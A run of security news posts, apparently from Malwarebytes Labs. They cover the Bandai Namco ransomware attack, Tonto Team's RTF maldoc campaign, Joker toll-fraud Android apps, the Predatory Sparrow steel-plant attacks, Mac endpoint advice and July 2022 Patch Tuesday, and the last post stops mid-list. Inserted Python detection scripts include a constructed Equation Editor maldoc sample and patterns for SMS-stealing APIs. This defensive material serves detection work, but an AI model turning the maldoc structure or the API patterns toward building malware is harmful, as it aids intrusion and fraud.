IT NEWS

Elden Ring maker Bandai Namco hit by ransomware and data leaks

It’s not been a great couple of months for gaming giant Bandai Namco. The name behind smash hit titles like Elden Ring and Dark Souls has endured a long run of cheats and hacks.

A Remote Code Execution (RCE) vulnerability in the online code of the Souls titles led to their multiplayer features being disabled for months. In March, in-game cheats in Elden Ring meant players had to turn off multiplayer to avoid new attacks.

We’re now in July and Bandai Namco has experienced its most serious issue yet, confirming that it has fallen victim to a ransomware attack.

Eurogamer published a Bandai Namco statement, which reads as follows:

“On 3rd July, 2022, Bandai Namco Holdings Inc. confirmed that it experienced unauthorised access by a third party to the internal systems of several Group companies in Asian regions (excluding Japan).

“After we confirmed the unauthorised access, we have taken measures such as blocking access to the servers to prevent the damage from spreading. In addition, there is a possibility that customer information related to the Toys and Hobby Business in Asian regions (excluding Japan) was included in the servers and PCs, and we are currently identifying the status about existence of leakage, scope of the damage, and investigating the cause.

“We will continue to investigate the cause of this incident and will disclose the investigation results as appropriate. We will also work with external organizations to strengthen security throughout the Group and take measures to prevent recurrence.”

Double threat

While triple threat attacks (which add a third lever, such as DDoS, on top of encryption and leaks) are becoming increasingly popular, double threat attacks (locking up data and then threatening to make it public if the ransom isn’t paid) are still big business. What we have here is a classic double threat, run by a group with no qualms about following through on its promises.

A screenshot shared on Twitter shows the attackers’ entry for the compromise tagged “data soon”. The fear is that data is going to be leaked at some point in the near future. There is currently no word on how much data has been taken, or what the ransomware operators are asking as payment.

Whether the data is related to employees, third parties, or even customers, we simply don’t know. Games publishers and developers are also host to significant amounts of confidential data for unreleased and unannounced games. This is an additional angle to consider. Would attackers value secret game IP over user data? Possibly.

The bad news carousel

This lands at a really bad time for Bandai Namco. It’s not so long ago that the Dark Souls multiplayer servers were in the process of being switched back on. This could well throw a large ransomware shaped spanner into the works for those plans.

There has to be concern over the considerable skill set of the BlackCat attackers, considering some of their likely past exploits. BlackCat stands accused of attacks on some of Europe’s largest ports back in February of this year. January saw data published belonging to a luxury fashion brand, and it wasn’t so long ago that the group was publishing stolen data related to a luxury spa and resort in the US.

This is one group which will absolutely carry out its extortion threats. BlackCat is also ramping up its typical ransom demand, currently weighing in at around $2.5m. It remains to be seen how Bandai Namco handles this situation. Unfortunately for the publisher and its customers, the ransomware operators are firmly in the driving seat.

The post Elden Ring maker Bandai Namco hit by ransomware and data leaks appeared first on Malwarebytes Labs.

China’s Tonto Team increases espionage activities against Russia

According to analyses by several cybersecurity firms and Ukraine’s Computer Emergency Response Team (CERT-UA), the state-sponsored threat actor Tonto Team, which has been linked to China-backed cyber operations, is ramping up its spying campaign against Russian government agencies.

The campaign, which involves an email, a malicious document in RTF (Rich Text Format), and a backdoor payload, starts by socially engineering recipients into opening the attachment, which triggers an exploit against a vulnerability in the Microsoft Office Equation Editor.

According to SentinelOne, the RTF file masquerades as a government advisory or security warning to agencies and infrastructure providers of potential attacks.

The malicious RTF document attached to an email sent by the Tonto Team to its targets, shared by one of our threat intelligence researchers on Twitter. (Source: Hossein Jazi | Malwarebytes)

The fake advisory is written in Russian. Below is the Google-translated text in English:

Translated text of the lure document. (Source: Hossein Jazi | Malwarebytes)
Dear colleagues!

In addition, we remind you that recently there have been more cases of attempts to steal logins / passwords for access of employees of the Ministry to official mail and the Service Portal.

Attackers on behalf of representatives of the Department of the Ministry of Foreign Affairs, government and other organizations send letters to e-mail addresses, in which they convince you to familiarize yourself with various documents and information.

Under no circumstances should you enter your service login / password in such cases.

Please note that the documents must be attached to the letter and opened from the body of the letter.

Compliance with these rules will allow you to maintain the confidentiality of not only your data, but also the data of other employees of the Ministry.

The Tonto Team used Royal Road (sometimes called “8.t”) to create the malicious RTF file. First analyzed by nao_sec, Royal Road is a document builder that gives threat actors the ability to embed malicious code within RTF files, aiding actors in compromising target systems.

The exploit is triggered upon opening the file, and the malware payload, Bisonal, is dropped. Bisonal, a tool many Chinese threat actors use, is a RAT (remote access Trojan). Apart from Chinese APTs (Advanced Persistent Threats), no other threat actor has used Bisonal.
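Royal Road documents are ordinary RTF files carrying an embedded OLE object that Word loads as soon as the file is opened. The following script is an added example written for this post, not Malwarebytes tooling and not a Tonto Team artifact: it pulls every \objdata blob out of an RTF, decodes the hex, and flags the Equation Editor class name or CLSID together with the \objupdate control word that forces the object to load without a click. The two documents it runs on are constructed for the example; the CLSID {0002CE02-0000-0000-C000-000000000046} is Equation Editor’s real class id.

```python
import binascii
import re

# \objupdate makes Word load/refresh the embedded object as soon as the document
# is opened, so an Equation Editor exploit fires without the user clicking anything.
AUTO_LOAD_WORD = b"\\objupdate"

# Markers of an Equation Editor (EQNEDT32.EXE) object inside the decoded \objdata
# stream: the OLE1 class name, and the Equation Editor CLSID
# {0002CE02-0000-0000-C000-000000000046} in its little-endian on-disk layout.
EQUATION_CLASS_NAMES = (b"Equation.3", b"Equation.2", b"EQNEDT32")
EQUATION_CLSID_LE = bytes.fromhex("02ce020000000000c000000000000046")
OLE_MAGIC = b"\xd0\xcf\x11\xe0"  # compound-file header often nested in \objdata

OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9a-fA-F\s]+)")
OBJCLASS_RE = re.compile(rb"\\objclass\s*([^\\{}]+)")


def decode_objdata(rtf: bytes):
    """Yield the decoded bytes of every \\objdata hex blob in the document."""
    for match in OBJDATA_RE.finditer(rtf):
        hexdata = re.sub(rb"\s+", b"", match.group(1))
        if len(hexdata) % 2:  # tolerate a dangling nibble
            hexdata = hexdata[:-1]
        try:
            yield binascii.unhexlify(hexdata)
        except binascii.Error:
            continue


def triage_rtf(rtf: bytes) -> dict:
    """Return a verdict and the list of reasons for one RTF document."""
    findings = []
    equation = autoload = False

    if not rtf.lstrip().startswith(b"{\\rtf1"):
        # Word accepts headers as short as "{\rt"; malicious builders abuse that.
        findings.append("non-standard RTF header")
    if AUTO_LOAD_WORD in rtf:
        autoload = True
        findings.append("\\objupdate: embedded object loads on open")
    for match in OBJCLASS_RE.finditer(rtf):
        cls = match.group(1).strip().decode(errors="replace")
        if cls.lower().startswith("equation"):
            equation = True
            findings.append(f"\\objclass {cls} declared")
    for blob in decode_objdata(rtf):
        if EQUATION_CLSID_LE in blob or any(n in blob for n in EQUATION_CLASS_NAMES):
            equation = True
            findings.append("Equation Editor class/CLSID inside \\objdata")
        if OLE_MAGIC in blob:
            findings.append("OLE compound file nested inside \\objdata")

    if equation and autoload:
        verdict = "suspicious"
    elif findings:
        verdict = "review"
    else:
        verdict = "clean"
    return {"verdict": verdict, "findings": findings}


# Constructed sample, not a real Royal Road file: a minimal RTF whose embedded
# object auto-updates and whose OLE1 header names the Equation.3 class.
SAMPLE_MALDOC = (
    b"{\\rtf1\\ansi\\deff0"
    b"{\\object\\objemb\\objupdate{\\*\\objclass Equation.3}"
    b"{\\*\\objdata 01050000 02000000 0b000000 "
    b"4571756174696f6e2e3300 "  # "Equation.3\0" as hex
    b"00000000 00000000 d0cf11e0a1b11ae1 00}}"
    b"\\par Please review the attached advisory.}"
)
SAMPLE_BENIGN = b"{\\rtf1\\ansi\\deff0 Quarterly figures are attached.\\par}"

if __name__ == "__main__":
    for name, doc in (("maldoc", SAMPLE_MALDOC), ("benign", SAMPLE_BENIGN)):
        print(name, triage_rtf(doc))
```

Real Royal Road samples obfuscate control words and pad the hex, so treat this as a first-pass filter and use oletools’ rtfobj for production triage; the dropped temp file named 8.t is the other quick indicator of a Royal Road document.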

The Tonto Team, an APT group that has been around almost as long as Bisonal, has many aliases: Karma Panda, Bronze Huntley, CactusPete, and Earth Akhlut. The group is known for targeting Asian nations (South Korea, Taiwan, and Japan) and Russia. So this isn’t the first time China has gone after the former Soviet state; what is notable is the increase in targeting activity against Russia.

“What we’re seeing here is a potential Chinese government increase in intelligence collection requirements from inside Russia,” SentinelOne Senior Threat Researcher Tom Hegel told Dark Reading in an interview. “Perhaps an increased prioritization or expansion of resources assigned to such tasking.”

The increased targeting coincides with the ongoing Russian invasion of Ukraine. Chinese officials describe the relationship with Russia as one of “comprehensive strategic partners of coordination”, and the two countries’ diplomatic ties have strengthened over the years, largely as a counterweight to the expansion of Western alliances.

What China is doing is “simply China looking out for itself in uncertain times,” Hegel is also quoted saying. “Like any well-resourced nation, they seek to support their own agenda through cyber, and the state of affairs in Russia may be adjusting just what they prioritize.”

Chinese hacking groups have been using Royal Road and Bisonal for years. Their longevity points to shared resources among these groups, which makes attribution difficult. The continued use of the same tools also suggests that campaigns against the targeted nations keep succeeding, which says something about the state of security in those countries.

“The fact that these toolkits evolve and continue to operate really speaks to how well they’re resourced, and the state of the defense side,” Hegel told CyberScoop in a separate interview. “Nothing can really stop them from continuing to use this. It’s still successful in many cases, as we see here. You look at the exploits they’re using in these documents, they’re years old exploits. They’re popping people that are out of date by quite a few years.”

The post China’s Tonto Team increases espionage activities against Russia appeared first on Malwarebytes Labs.

New variant of Android SpyJoker malware removed from Play Store after 3 million+ installs

Security researcher Maxime Ingrao has found a new variant of Android/Trojan.Spy.Joker which he’s dubbed Autolycos. Malware in this family secretly subscribes users to premium services. The researcher noted that the eight applications that contained this malware had racked up a total of over 3 million downloads.

Toll fraud malware

Toll fraud malware is a subcategory of billing fraud in which malicious applications subscribe users to premium services without their knowledge or consent. At the moment, toll fraud malware is one of the most prevalent types of Android malware, and not only does the number of infections keep going up, so does the sophistication of the malware.

Joker

Android/Trojan.Spy.Joker was the first major family that specialized in this field. It was first found in the Play Store in 2017. Joker is capable of clicking on online ads, and asks for SMS permissions during installation so it can access One Time Passwords (OTPs) to secretly approve payments. The user will never know that they have been subscribed to some service online until they check their bank statements or phone invoice.

Detection

Google uses the name Bread for the Joker malware family. In January, 2020, Google Play Protect detected and removed 1,700 unique Bread apps from the Play Store. By using as little code as possible and thoroughly hiding it, Joker generates a very discreet footprint which makes it hard to detect. But SMS and toll fraud generally require some basic functionality like disabling WiFi which needs one of a handful of APIs. Since Joker expects security researchers to look for those APIs, it uses a wide variety of techniques to mask the usage of them.
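To make the point concrete, here is an added example (not code from this post or from the researcher) that checks an app decoded with apktool for the combination Joker needs: SMS permissions in AndroidManifest.xml plus calls that turn Wi-Fi off or pin traffic to the mobile network, since direct carrier billing only works over cellular. The manifest and smali snippets it scans are constructed for the example, and the verdict thresholds are the example’s own.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Permissions a toll-fraud app needs to read the carrier's confirmation SMS (OTP)
# or to send the subscription keyword itself.
SMS_PERMISSIONS = {
    "android.permission.READ_SMS",
    "android.permission.RECEIVE_SMS",
    "android.permission.SEND_SMS",
    "android.permission.RECEIVE_WAP_PUSH",
}

# Smali method references worth flagging. Direct carrier billing only works over
# the mobile network, so toll fraud turns Wi-Fi off or pins its traffic to
# cellular, then reads or sends SMS to complete the subscription.
SUSPICIOUS_CALLS = {
    "Landroid/net/wifi/WifiManager;->setWifiEnabled(Z)Z": "toggles Wi-Fi",
    "Landroid/net/ConnectivityManager;->requestNetwork(": "requests a specific network (cellular pinning)",
    "Landroid/net/ConnectivityManager;->bindProcessToNetwork(": "binds the process to a chosen network",
    "Landroid/telephony/SmsManager;->sendTextMessage(": "sends SMS",
    "Landroid/telephony/SmsMessage;->createFromPdu(": "parses incoming SMS PDUs",
}


def manifest_permissions(manifest_xml: str) -> set:
    """Collect <uses-permission android:name=...> values from a decoded manifest."""
    root = ET.fromstring(manifest_xml.encode("utf-8"))
    return {el.get(ANDROID_NS + "name", "") for el in root.iter("uses-permission")}


def scan_smali(smali_files: dict) -> dict:
    """Map each suspicious method reference to the smali files that contain it."""
    hits = {}
    for path, source in smali_files.items():
        for signature in SUSPICIOUS_CALLS:
            if signature in source:
                hits.setdefault(signature, []).append(path)
    return hits


def triage_app(manifest_xml: str, smali_files: dict) -> dict:
    """Score one decoded app on SMS permissions plus network/SMS API use."""
    sms_perms = manifest_permissions(manifest_xml) & SMS_PERMISSIONS
    calls = scan_smali(smali_files)
    reasons = [f"requests {p}" for p in sorted(sms_perms)]
    reasons += [
        f"{SUSPICIOUS_CALLS[sig]} in {', '.join(sorted(files))}"
        for sig, files in sorted(calls.items())
    ]
    # A camera or keyboard app has no business with SMS *and* network pinning.
    if sms_perms and calls:
        verdict = "likely toll fraud"
    elif sms_perms or calls:
        verdict = "needs review"
    else:
        verdict = "no toll-fraud indicators"
    return {"verdict": verdict, "reasons": reasons}


# Constructed sample of an apktool-decoded "camera" app, not a real Joker sample.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.camera">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.CAMERA"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <application android:label="Camera"/>
</manifest>
"""
SAMPLE_SMALI = {
    "smali/com/example/camera/a/b.smali": """.class public Lcom/example/camera/a/b;
.method public a(Landroid/content/Context;)V
    invoke-virtual {p0, v0}, Landroid/net/wifi/WifiManager;->setWifiEnabled(Z)Z
    invoke-virtual {p0, v1, v2}, Landroid/net/ConnectivityManager;->requestNetwork(Landroid/net/NetworkRequest;Landroid/net/ConnectivityManager$NetworkCallback;)V
    return-void
.end method
""",
    "smali/com/example/camera/MainActivity.smali": ".class public Lcom/example/camera/MainActivity;\n",
}
BENIGN_MANIFEST = SAMPLE_MANIFEST.replace(
    '  <uses-permission android:name="android.permission.READ_SMS"/>\n', ""
).replace('  <uses-permission android:name="android.permission.RECEIVE_SMS"/>\n', "")

if __name__ == "__main__":
    print(triage_app(SAMPLE_MANIFEST, SAMPLE_SMALI))
    print(triage_app(BENIGN_MANIFEST, {"smali/Main.smali": ".class public LMain;\n"}))
```

Plain string matching only catches the lazy variants: Joker resolves these APIs through reflection, encrypts the strings, and loads the billing code from a downloaded DEX, so a clean result here narrows the review rather than clearing the app.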

Slow response

The small footprint and masked usage of APIs must make it hard to find malicious apps among the multitude of apps that can be found in the Google Play Store. But that doesn’t explain why it took Google over a year to remove the eight apps reported by Maxime Ingrao. He reported the apps in June, 2021, and the last two were removed on July 13, 2022. It’s possible they would still be available if the researcher hadn’t gone public because he said he got tired of waiting.

Autolycos

As mentioned earlier, the malware is still undergoing development. What is new about this type is that it no longer requires a WebView. WebViews are exactly what the name indicates—a small view to a piece of Web content. A WebView can be a tiny part of the app screen, a whole page, or anything in between. Not requiring a WebView greatly reduces the chances that the user of an affected device notices something fishy is going on. Autolycos avoids WebView by executing URLs on a remote browser and then including the result in HTTP requests.

Malicious apps

BleepingComputer posted the list of malicious apps found by Maxime Ingrao, which users may still have installed:

  • Vlog Star Video Editor (com.vlog.star.video.editor) – 1 million downloads
  • Creative 3D Launcher (app.launcher.creative3d) – 1 million downloads
  • Wow Beauty Camera (com.wowbeauty.camera) – 100,000 downloads
  • Gif Emoji Keyboard (com.gif.emoji.keyboard) – 100,000 downloads
  • Freeglow Camera 1.0.0 (com.glow.camera.open) – 5,000 downloads
  • Coco Camera v1.1 (com.toomore.cool.camera) – 1,000 downloads
  • Funny Camera by KellyTech – 500,000 downloads
  • Razer Keyboard & Theme by rxcheldiolola – 50,000 downloads

Pradeo researchers have also identified four new malicious applications that embed the Joker malware:

  • Smart SMS Messages – 50,000+ installs
  • Blood Pressure Monitor – 10,000+ installs
  • Voice Languages Translator – 10,000+ installs
  • Quick Test SMS – 10,000+ installs

How to avoid toll fraud malware

Users that have any of the listed apps installed are advised to remove them as soon as possible. To avoid getting infected and duped by toll fraud malware there are a few countermeasures you can take:

  • Keep Play Protect active.
  • Pay attention to apps asking for permissions, in this case especially SMS permissions.
  • Minimize the number of apps you install, however useful they may seem. The Autolycos operators created numerous advertising campaigns on social media.
  • Do not rely on user reviews alone, since the malware authors use bots to maintain a good user rating.

Also, always keep an eye on your background internet data, battery consumption, phone invoices, and bank statements, just in case. The sooner you stop it, the smaller the damage.

The post New variant of Android SpyJoker malware removed from Play Store after 3 million+ installs appeared first on Malwarebytes Labs.

Predatory Sparrow massively disrupts steel factories while keeping workers safe

Stuxnet‘s attack on Iran’s uranium enrichment facilities manifested fears of cyberattacks leaking into the real world. What once was theory is now upon us.

Two weeks ago, multiple Iranian steel facilities experienced a cyberattack that might have been pulled off by what many cybersecurity experts in the field believe is “a professional and tightly regulated team of state-sponsored military hackers, who may even be obliged to carry out risk assessments before they launch an operation.”

The group who claimed responsibility for the attack goes by the nom de hack Predatory Sparrow.

Predatory Sparrow’s logo, which it uses on its Telegram and Twitter accounts. (Source: The BBC)

The victim organizations are the Khouzestan Steel Company (KSC), Mobarakeh Steel Company (MSC), and Hormozgan Steel Company (HOSCO).

Some say Predatory Sparrow’s name is a play on “Charming Kitten”, the name of the notorious Iranian APT (advanced persistent threat) group. Although Predatory Sparrow has its own social media accounts, these are not searchable under the English nom but under its Persian equivalent, Gonjeshke Darande.

The attackers caused the foundry to spew molten steel and fire onto the factory floor, but only after workers had cleared the area, unaware of what was about to happen. The timing of the group’s attack was deliberate.

A video captured during one of these attacks was shared on its social platforms as proof. It already has 200,000 views.

“Today, 27/06/2022, we, ‘Gonjeshke Darande’, carried out cyberattacks against Iran’s steel industry which affiliated [sic] with the IRGC and the Basij,” a caption within the video reads. “These companies are subject to international sanctions and continue their operations despite the restrictions.

“These cyberattacks, being carried out carefully so to protect innocent individuals, are in response to the aggression of the Islamic Republic.”

The public office of the Iranian National Cyberspace Center confirmed the attacks, blaming the incidents on “foreign enemies.” The outcome triggered a temporary shutdown of facilities. The public office also claimed, “Security systems quickly took action to contain and repel the effects.”

According to sources close to two of the affected organizations, the only reason the production lines escaped severe damage was that they were switched off at night due to power supply restrictions. The attack “is understood” to have occurred between midnight and 6AM Tehran time, and affected both production and security systems.

At this point, no one knows whether Predatory Sparrow is state-sponsored, or merely a group of hacktivists out to punish corporations it sees as crossing a line.

“If this does turn out to be a state sponsored cyber-attack causing physical – or in the war studies jargon ‘kinetic’ damage – this could be hugely significant,” Emily Taylor, editor of the Cyber Policy Journal, told the BBC.

Ersin Cahmutoglu, a cybersecurity researcher from ADEO Cyber Security Services, also has a theory. “If this cyberattack is state-sponsored then of course Israel is the prime suspect. Iran and Israel are in a cyber-war, and officially both states acknowledge this.”

“Both states mutually organise cyberattacks through their intelligence services and everything has escalated since 2020 when retaliation came from Israel after Iran launched a failed cyberattack on Israeli water infrastructure systems and attempted to interfere with the chlorine level.”

UK-based Iranian activist and independent cyberespionage investigator Nariman Gharib also shared his thoughts: “If Israel is behind these attacks, I think they are showing that they can do real damage rather than just disrupting a service. It shows how things can quickly escalate.”

Last week, Predatory Sparrow leaked “top secret documents and tens of thousands of emails”, along with “trading practices” from the steel makers it attacked.

The post Predatory Sparrow massively disrupts steel factories while keeping workers safe appeared first on Malwarebytes Labs.

Endpoint security for Mac: 3 best practices

If you’re one of the 50% of small and medium-sized businesses (SMBs) that use Mac devices today, chances are your IT and security teams have a ton of Mac endpoints to monitor. 

Securing that many endpoints can get really complex, really fast, especially when you consider that the common wisdom that Macs don’t get malware simply isn’t true: in fact, the number of malware detections on Mac jumped 200% year-on-year in 2021. 

And it’s not just malware you have to worry about with your Mac endpoints. 

Phishing attacks, vulnerability exploits, DDoS attacks, and much more threaten your company’s Macs at any time, and if any of them is successful, it could cost your business millions in lost productivity and information theft.

Needless to say, these are a lot of different threats to deal with when it comes to Mac endpoint security. But Thomas Reed, Director of Mac & Mobile at Malwarebytes, is here to remind us of a few simple things we can do to make our Mac endpoints more secure. 

In this post, we break down three of Reed’s best practices for endpoint security for Mac. 

1. Update frequently

As in the Windows world, one of your top priorities needs to be keeping your Macs up to date — and by now we should all understand why. Just consider the fact that 60% of companies say breaches could have been avoided if they had patched known vulnerabilities. 

Tracking and patching vulnerabilities on macOS, however, is a little more difficult to do than on Windows. 

While Microsoft announces its security updates on a predictable schedule with Patch Tuesday, Apple ships patches on an ad-hoc basis, so macOS admins need to put in a little more legwork to keep their devices up to date.

To ensure that you know about the latest updates for your Mac endpoints, there are two things you should do.

  1. Sign up for Apple’s public security notifications and announcements mailing list. You’ll get an email anytime Apple releases a patch for macOS.
  2. Regularly check Apple’s list of security updates and patches. It provides patch names, patch information, affected devices, and release dates.
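Knowing that a patch exists is only half the job; you also need to know which endpoints have not applied it yet. As an added example written for this post (not Apple’s or Malwarebytes’ code), here is a small reporter that parses the output of Apple’s softwareupdate --list so you can push it to your Macs over MDM or SSH and collect which machines still have recommended updates pending and which of those need a restart. It assumes the “Label:/Title:” output format that macOS 10.15 and later use; the sample output it is tested against is constructed.

```python
import re
import subprocess

LABEL_RE = re.compile(r"^\* Label: (.+)$")
FIELD_RE = re.compile(r"(\w+): ([^,]+),")


def parse_softwareupdate(output: str) -> list:
    """Parse `softwareupdate --list` text into one dict per pending update."""
    updates = []
    current = None
    for line in output.splitlines():
        label = LABEL_RE.match(line.strip())
        if label:
            current = {"label": label.group(1).strip()}
            updates.append(current)
        elif current is not None and line[:1] in ("\t", " "):
            # Detail line: "Title: macOS Monterey, Version: 12.5, ..., Action: restart,"
            for key, value in FIELD_RE.findall(line.strip() + ","):
                current[key.lower()] = value.strip()
    return updates


def updates_needing_action(updates: list) -> list:
    """Return (label, action) for updates Apple marks Recommended: YES."""
    return [
        (u["label"], u.get("action", "none"))
        for u in updates
        if u.get("recommended", "").upper() == "YES"
    ]


def pending_updates_on_this_mac() -> list:
    """Run the real tool (macOS only); softwareupdate writes to both streams."""
    proc = subprocess.run(["softwareupdate", "--list"], capture_output=True, text=True)
    return parse_softwareupdate(proc.stdout + proc.stderr)


# Constructed sample output in the format softwareupdate --list has used since 10.15.
SAMPLE_OUTPUT = """Software Update Tool

Finding available software
Software Update found the following new or updated software:
* Label: macOS Monterey 12.5-21G72
\tTitle: macOS Monterey, Version: 12.5, Size: 12345678KiB, Recommended: YES, Action: restart,
* Label: Safari15.6MontereyAuto-15.6
\tTitle: Safari, Version: 15.6, Size: 65432KiB, Recommended: YES,
* Label: Command Line Tools beta 5 for Xcode-14.0
\tTitle: Command Line Tools beta 5 for Xcode, Version: 14.0, Size: 600000KiB, Recommended: NO,
"""

if __name__ == "__main__":
    print(updates_needing_action(pending_updates_on_this_mac()))
```

Collect the returned list per hostname and you have the asset view the next paragraph describes as missing; a machine that keeps reporting an update with Action: restart is one a user keeps postponing.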

Additionally, if you’re like most businesses and find that having no common view of assets is causing you major delays in patching, you should consider a vulnerability management solution that gives you instant visibility into potential vulnerabilities across your macOS environment.

2. Use a DNS filter to stop web-based attacks

Since Macs have a much smaller amount of “traditional” malware attacking them compared to Windows, you might think your endpoints are in the clear of cyberattacks. 

Not so. 

Instead of file-based malware, a lot of Mac users get attacked with adware and PUPs that are typically delivered through a number of web-based scams. These threats can throw advertisements up on your screen and slow your computer down, among other things.

OK, that sounds annoying. But surely a few advertisements aren’t too big a threat to your Mac endpoint security, right? Not quite, says Thomas Reed.

“Some of the adware out there is more sophisticated than most of the malware that we see for Mac,” Reed says. “It can do all kinds of stuff, like sending all your network traffic through a proxy or changing system settings to be less secure.”

Reed also mentions that a lot of adware and PUPs are part of the payload of scam sites that direct you to some kind of installer that you download — and so having some sort of web-based protection is vital. That’s where DNS filtering comes in.

“The source of all of these kinds of attacks is through the web, and DNS filtering can help with that by blocking some of those sites,” Reed says.

DNS filtering blocks connections to malicious web servers attempting to deliver malware payloads, so any business interested in Mac endpoint security should have it. Learn more about the ways DNS filtering can save your business from cyberattacks.

3. Don’t rely on Mac AV – use EDR 

Since 2009, Apple has included a built-in antivirus (AV) technology called XProtect in macOS. It is fairly good, but there are plenty of threats it doesn’t detect that a third-party product would.

“You can’t rely on the built-in antivirus that’s in Mac OS to do the job,” Reed says. “You really need to have something else on top of that.”

Even so, let’s be generous and say that XProtect plus your third-party AV detect and remove every file-based Mac malware threat. Traditional AVs still can’t prevent more sophisticated threats such as fileless attacks, so you may be left wondering what you can do to best protect your Macs from damaging endpoint attacks.

Endpoint detection and response (EDR) is the answer. 

EDR gives you a real-time “birds-eye view” of all of your Mac endpoints, so whenever something happens outside the norm you can isolate the endpoint, quarantine the threat, or remediate. This stands in contrast to reactive, signature-based solutions (like AV) that only act once malware matches a known signature, often after it has already executed.

A key feature of EDR is its threat hunting capabilities. Read our Threat Hunting Made Easy eBook to learn how to save hours every month on threat investigation and response.

Protect your Mac endpoints from online threats

With everything from security vulnerabilities to malware threatening your company’s Macs at all times, Mac endpoint security is high-up on the list of priorities for macOS admins. In this post, we explained how macOS admins can stay on top of their patching game and why having a DNS filter and EDR are so essential for protecting Mac endpoints from a variety of threats.

Want to learn more about what simple and effective Mac endpoint protection looks like in action? Watch the demonstration of Malwarebytes Endpoint Detection and Response (EDR)!

The post Endpoint security for Mac: 3 best practices appeared first on Malwarebytes Labs.

Update now—July Patch Tuesday patches include fix for exploited zero-day

It’s time to triage a lot of patching again. Microsoft’s July Patch Tuesday includes a fix for an actively exploited local privilege escalation vulnerability in the Windows Client/Server Runtime Subsystem (CSRSS). The Cybersecurity & Infrastructure Security Agency (CISA) immediately added it to its Known Exploited Vulnerabilities catalog, with a remediation due date of August 2, 2022.

Microsoft

In total, the Microsoft updates include fixes for 84 vulnerabilities. Four of them are rated “Critical”; all four are remote code execution (RCE) vulnerabilities.

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database, whose goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). These are the CVEs assigned to the four Critical vulnerabilities:

CVE-2022-22029: Windows Network File System (NFS) RCE vulnerability. This vulnerability is not exploitable in NFSV4.1. Prior to updating your version of Windows that protects against this vulnerability, you can mitigate an attack by disabling NFSV3, but this may adversely affect your ecosystem and should only be used as a temporary mitigation.

CVE-2022-22039: Another Windows Network File System (NFS) RCE vulnerability. It’s possible to exploit this vulnerability over the network by making an unauthenticated, specially crafted call to a Network File System (NFS) service to trigger an RCE.

CVE-2022-22038: Remote Procedure Call Runtime RCE vulnerability. Successful exploitation of this vulnerability requires an attacker to invest time in repeated exploitation attempts through sending constant or intermittent data.

CVE-2022-30221: Windows Graphics Component RCE vulnerability. An attacker would have to convince a targeted user to connect to a malicious RDP server. On connecting, the malicious server could execute code on the victim’s system in the context of the targeted user.

Azure Site Recovery

A large share of the patches, 32 in total, address vulnerabilities in Azure Site Recovery that could allow attackers to gain elevated privileges or perform remote code execution. Azure Site Recovery is an integrated disaster recovery service for Azure that helps ensure business continuity by keeping business apps and workloads running during outages.

According to Microsoft, SQL injection vulnerabilities caused most of the privilege escalation bugs in Azure Site Recovery.

CVE-2022-22047

The vulnerability that is known to be exploited in the wild is an elevation of privilege (EoP) vulnerability. An attacker who successfully exploited this vulnerability could gain SYSTEM privileges.

This type of vulnerability usually comes into play once an attacker has gained an initial foothold. They can then use this vulnerability to gain more permissions and expand their access to the compromised system.

The vulnerability is described as a Windows CSRSS Elevation of Privilege vulnerability. CSRSS is the Windows component that provides the user mode side of the Win32 subsystem. CSRSS is critical for a system’s operation and is mainly responsible for Win32 console handling and GUI shutdown.

Vulnerabilities of this type are often chained with others, for example with an Office macro providing the initial foothold, which makes Microsoft’s decision to roll back its blocking of Office macros hard to understand, even if the rollback is only temporary.
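Here is an added example, not part of the original post, of how I would triage a release like this one: cross-reference the month’s CVEs against CISA’s Known Exploited Vulnerabilities (KEV) catalog and order the work by KEV due date first, then Critical RCEs, then everything else. The KEV extract below is constructed in the shape of CISA’s JSON feed (https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json), with the CVE-2022-22047 entry carrying the August 2, 2022 due date mentioned above; the descriptive field values are placeholders.

```python
import json
from datetime import date

# Constructed extract in the shape of CISA's KEV feed. Only cveID and dueDate
# are used below; the descriptive fields are placeholders.
KEV_JSON = json.dumps({
    "title": "CISA Catalog of Known Exploited Vulnerabilities",
    "vulnerabilities": [
        {
            "cveID": "CVE-2022-22047",
            "vendorProject": "Microsoft",
            "product": "Windows",
            "vulnerabilityName": "Windows CSRSS Privilege Escalation Vulnerability",
            "dateAdded": "2022-07-12",
            "requiredAction": "Apply updates per vendor instructions.",
            "dueDate": "2022-08-02",
        }
    ],
})

# The July 2022 CVEs discussed above, tagged with the class the text gives them.
PATCH_TUESDAY = {
    "CVE-2022-22047": "EoP",
    "CVE-2022-22029": "RCE",
    "CVE-2022-22039": "RCE",
    "CVE-2022-22038": "RCE",
    "CVE-2022-30221": "RCE",
}


def load_kev(kev_json: str) -> dict:
    """Index the KEV feed by CVE id."""
    return {v["cveID"]: v for v in json.loads(kev_json)["vulnerabilities"]}


def prioritize(patch_cves: dict, kev: dict, today: date) -> list:
    """Order CVEs: KEV entries by due date first, then Critical RCEs, then the rest."""
    rows = []
    for cve, kind in patch_cves.items():
        entry = kev.get(cve)
        if entry:
            due = date.fromisoformat(entry["dueDate"])
            days_left = (due - today).days
            status = "OVERDUE" if days_left < 0 else f"{days_left} days left"
            rows.append((0, due, cve, f"in KEV, due {due.isoformat()}, {status}"))
        elif kind == "RCE":
            rows.append((1, date.max, cve, "Critical RCE, not (yet) in KEV"))
        else:
            rows.append((2, date.max, cve, "normal patch cadence"))
    rows.sort()
    return [(cve, note) for _, _, cve, note in rows]


if __name__ == "__main__":
    for cve, note in prioritize(PATCH_TUESDAY, load_kev(KEV_JSON), date.today()):
        print(f"{cve}: {note}")
```

In practice you download the live feed from the URL above and pass its contents to load_kev; KEV only lists what CISA has confirmed as exploited, so a Critical RCE that is not in it today may well be tomorrow, which is why the RCEs sit in the second tier rather than the last.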

Other vendors

Other vendors have synchronized their periodic updates with Microsoft. Here are a few major ones that you may find in your environment.

Adobe released security updates for Acrobat, Character Animator, Photoshop,  Reader, and RoboHelp.

